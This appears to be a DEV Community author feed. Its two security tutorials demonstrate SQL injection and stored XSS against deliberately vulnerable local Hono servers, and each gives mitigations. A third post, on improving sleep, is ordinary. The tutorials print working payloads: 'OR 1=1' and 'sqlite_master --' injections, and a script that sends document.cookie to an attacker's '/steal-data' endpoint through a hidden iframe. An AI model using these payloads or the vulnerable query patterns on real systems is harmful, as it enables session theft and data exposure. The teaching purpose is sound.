DEV Community: kaazzu

Learning About Security: SQL Injection

kaazzu — Thu, 07 Nov 2024 13:34:09 +0000

What is SQL Injection?

SQL Injection is an attack technique that manipulates SQL queries by inserting malicious code, allowing unauthorized operations on the database.

SQL Injection Attack Example

Using Bun's SQLite3 driver and Hono, we’ll set up two servers: one on localhost:3000 (target) and one on localhost:4000 (attacker) to demonstrate an SQL Injection attack.

Target Server

On the target server, we create a /user endpoint to retrieve data from a users table based on an id specified in the URL query parameter. We’ll populate this users table with a few records.

import { Hono } from "hono";
import { Database } from "bun:sqlite";

const app = new Hono();
const db = new Database(":memory:");

db.run(
  "CREATE TABLE IF NOT EXISTS users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
);
db.run("INSERT INTO users (username, password, role) VALUES ('admin', 'adminpass', 'admin')");
db.run("INSERT INTO users (username, password, role) VALUES ('john_doe', 'john123', 'user')");
db.run("INSERT INTO users (username, password, role) VALUES ('jane_doe', 'jane123', 'user')");
db.run("INSERT INTO users (username, password, role) VALUES ('alice', 'alice123', 'user')");
db.run("INSERT INTO users (username, password, role) VALUES ('bob', 'bob123', 'user')");
db.run("INSERT INTO users (username, password, role) VALUES ('charlie', 'charlie123', 'user')");

app.get("/user", (c) => {
  const id = c.req.query("id");
  const query = db.query(`SELECT * FROM users WHERE id = ${id}`);
  const user = query.all();
  return c.json(user);
});

export default app;

Attacker Server

On the attacker server, we create an /attack endpoint that sends a request to the /user endpoint on the target server with a SQL Injection attempt.

import { Hono } from "hono";

const app = new Hono();

app.get("/attack", async (c) => {
  const response = await fetch("http://localhost:3000/user?id=1 OR 1=1");
  const data = await response.json();
  return c.json(data);
});

export default {
  port: 4000,
  fetch: app.fetch,
};

Launching the Attack

By accessing http://localhost:4000/attack, the following JSON response is returned:

[
  {"id":1,"username":"admin","password":"adminpass","role":"admin"},
  {"id":2,"username":"john_doe","password":"john123","role":"user"},
  {"id":3,"username":"jane_doe","password":"jane123","role":"user"},
  {"id":4,"username":"alice","password":"alice123","role":"user"},
  {"id":5,"username":"bob","password":"bob123","role":"user"},
  {"id":6,"username":"charlie","password":"charlie123","role":"user"}
]

This occurs because the target server executes SELECT * FROM users WHERE id=1 OR 1=1. The 1=1 condition is always true, so it includes all rows in the query result, revealing all user data.

SQL Injection Mitigation

One way to prevent SQL Injection is to use parameterized queries. With parameterized queries, user input is treated as data, not executable SQL, nullifying injection attempts.

Fixing the Target Code

Here’s how we can modify the target server’s /user endpoint to prevent SQL Injection:

app.get("/user", (c) => {
  const id = c.req.query("id");
  const query = db.query(`SELECT * FROM users WHERE id = ?`);
  const user = query.all(id);
  return c.json(user);
});

With this change, an attack attempt will return an empty JSON.

Cases Where Parameterized Queries Are Ineffective

If table names or column names are dynamically modified based on user input, parameterized queries may not offer protection. This could still result in unauthorized data access.

Example with Dynamic Table Name

Sending a table=sqlite_master -- parameter retrieves database schema information, as sqlite_master holds metadata in SQLite.

Target Server Code

app.get("/select_table", (c) => {
  const table = c.req.query("table");
  const query = db.query(`SELECT * FROM ${table} WHERE role = ?`);
  const results = query.all("user");

  return c.json({
    message: `Data from table ${table}`,
    data: results,
  });
});

Attacker Server Code

app.get("/attack_table", async (c) => {
  const targetUrl = "http://localhost:3000/select_table?table=sqlite_master --";
  const response = await fetch(targetUrl);
  const result = await response.json();

  return c.json(result);
});

Mitigation Using a Whitelist

Since table names cannot be parameterized, validating them with a whitelist is necessary to prevent SQL Injection.

app.get("/select_table", (c) => {
  const table = c.req.query("table");

  // Validate table name using a whitelist
  const allowedTables = ["users"];
  if (!allowedTables.includes(table)) {
    return c.json({ message: "Invalid table name" }, 400);
  }

  const query = db.query(`SELECT id, username, role FROM ${table} WHERE role = ?`);
  const results = query.all("user");

  return c.json({
    message: `Data from table ${table}`,
    data: results,
  });
});

By enforcing a whitelist, we ensure only authorized tables are queried, providing a safeguard against SQL Injection in cases where parameterization isn’t possible.

Understanding Stored XSS Attacks and How to Mitigate Them with Hono

kaazzu — Thu, 07 Nov 2024 12:26:39 +0000

In this article, I'll explain how a Cross-Site Scripting (XSS) attack works and walk through a simple example of implementing and testing a stored XSS attack using Hono. I’ll also provide code samples for both the victim's and the attacker’s setup, along with ways to defend against such attacks.

How XSS Attacks Work

Cross-Site Scripting (XSS) is a type of web vulnerability that allows an attacker to inject malicious scripts into a web page. When other users visit the page or perform certain actions, the script executes in their browser, potentially compromising their data or leading to unauthorized actions.

Types of XSS Attacks

Stored XSS Attack: The attacker submits a script through a feature like a comment section. When other users view the page, the malicious script runs in their browser.
Reflected XSS Attack: The attacker tricks the user into clicking a link that sends a request to the server, reflecting the script in the response and executing it.
DOM-based XSS Attack: The script executes directly within the browser as a result of DOM manipulation.

In this post, we'll focus on stored XSS, demonstrating how it works and how to prevent it.

Setting up the Attack

We’ll create two servers using Hono, one for the victim (localhost:3000) and one for the attacker (localhost:4000).

Victim's Server

The victim's server has a simple comment submission and display feature. We’ll also set a cookie in the user’s browser to represent session data that the attacker will try to steal.

index.ts for the Victim's Server

import { Hono } from "hono";
import { setCookie } from "hono/cookie";

const app = new Hono();

let comments = [];

app.get("/", (c) => {
  setCookie(c, "session_id", "test"); // Setting a test session cookie
  const commentList = comments.map((comment) => `<li>${comment}</li>`).join("");

  const html = `
    <html>
      <body>
        <form action="/comment" method="POST">
          <input type="text" name="comment" placeholder="Enter a comment..." required />
          <button type="submit">Submit</button>
        </form>
        <ul>${commentList}</ul>
      </body>
    </html>
  `;

  return c.html(html);
});

app.post("/comment", async (c) => {
  const { comment } = await c.req.parseBody();
  comments.push(comment); // Store the comment without any sanitization (for demonstration)
  return c.redirect("/");
});

export default app;

This server allows users to submit comments, which will display on the same page. A session cookie, session_id, is also set in the browser.

Attacker's Server

The attacker's server is set up to receive and log data sent by the victim's server through a malicious script embedded in a comment.

index.ts for the Attacker's Server

import { Hono } from "hono";

const app = new Hono();

app.get("/", (c) => {
  return c.text("Hello Hono!");
});

app.post("/steal-data", async (c) => {
  const data = await c.req.parseBody();
  console.log("Stolen Data:", data);
  return c.text("Data received");
});

export default {
  port: 4000,
  fetch: app.fetch,
};

This server listens for any incoming data and logs it to the console.

Launching the Attack

The attacker injects the following script into the victim's comment section:

<script>
  (function() {
    const stolenData = document.cookie;
    const iframe = document.createElement('iframe');
    iframe.style.display = 'none';
    iframe.name = 'hiddenIframe';
    document.body.appendChild(iframe);
    const form = document.createElement('form');
    form.action = 'http://localhost:4000/steal-data';
    form.method = 'POST';
    form.target = 'hiddenIframe';
    const hiddenField = document.createElement('input');
    hiddenField.type = 'hidden';
    hiddenField.name = 'cookie';
    hiddenField.value = stolenData;
    form.appendChild(hiddenField);
    document.body.appendChild(form);
    form.submit();
  })();
</script>

When this script is submitted as a comment, it captures the user's cookie (document.cookie) and sends it to the attacker's server in a hidden iframe.

Preventing Stored XSS Attacks

To protect against XSS attacks, consider the following defenses:

1. Escaping User Input

Escaping special characters before displaying user-generated content prevents scripts from executing as HTML.

function escapeHTML(str) {
  return str
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

const commentList = comments.map((comment) => `<li>${escapeHTML(comment)}</li>`).join("");

2. Setting Content Security Policy (CSP) Headers

Using CSP headers limits where scripts can load from, making it harder for attackers to run unauthorized scripts.

import { secureHeaders } from "hono/secure-headers";

app.use(
  "*",
  secureHeaders({
    contentSecurityPolicy: {
      scriptSrc: ["'self'"],
    },
  })
);

3. Using HttpOnly Cookies

Setting the HttpOnly flag on cookies makes them inaccessible to JavaScript, preventing them from being stolen by XSS attacks.

setCookie(c, "session_id", "test", { httpOnly: true });

This flag ensures the session_id cookie cannot be accessed through JavaScript, adding another layer of security.

Conclusion

Stored XSS attacks can have severe implications, allowing attackers to steal user data or perform actions on behalf of users. By implementing proper input sanitization, configuring CSP headers, and using HttpOnly cookies, you can mitigate the risk of XSS attacks and protect user data.

Feel free to try out this example in a safe, local environment, and implement these defenses in your applications to safeguard against XSS attacks.

Rejuvenating My Health at 31: A Personal Journey

kaazzu — Tue, 30 Apr 2024 14:07:56 +0000

As I navigated my early thirties, I began to notice a decline in my health that was hard to ignore. At 31, I found myself grappling with frequent illnesses, an inability to concentrate at work due to constant fatigue, and a susceptibility to injuries during my workouts. These issues not only hindered my professional performance but also threatened the richness of my life experience. Concerned, I decided it was time for a change.

Revamping My Lifestyle

My typical day was a marathon of activities: I'd finish work, hit the gym, and then dive into personal projects until the early hours of the morning. Sleeping at around 1 or 2 AM became the norm, resulting in about six hours of sleep per night.

Realizing the importance of adequate rest, I set a goal to secure 7-8 hours of sleep each night. This meant rethinking my entire schedule, including my bedtime, which I adjusted to between 11 PM and 12 PM. To make room for this change, I had to cut down on passive activities like aimlessly scrolling through YouTube and limit my smartphone usage.

Overcoming Sleep Challenges

Despite my best efforts to sleep earlier, I initially struggled. Habitually, I would wake up around 4 AM, unable to return to sleep. It took several persistent attempts to finally achieve a full 7 hours of sleep. The impact was profound: I woke up with a clearer mind and an enhanced ability to concentrate, especially in the mornings.

Looking Ahead

The journey of improving my health as I age is ongoing, and I plan to share more of what I learn along the way. If you find this article helpful, please give it a like. Let’s embrace a healthier lifestyle together, making small but impactful changes.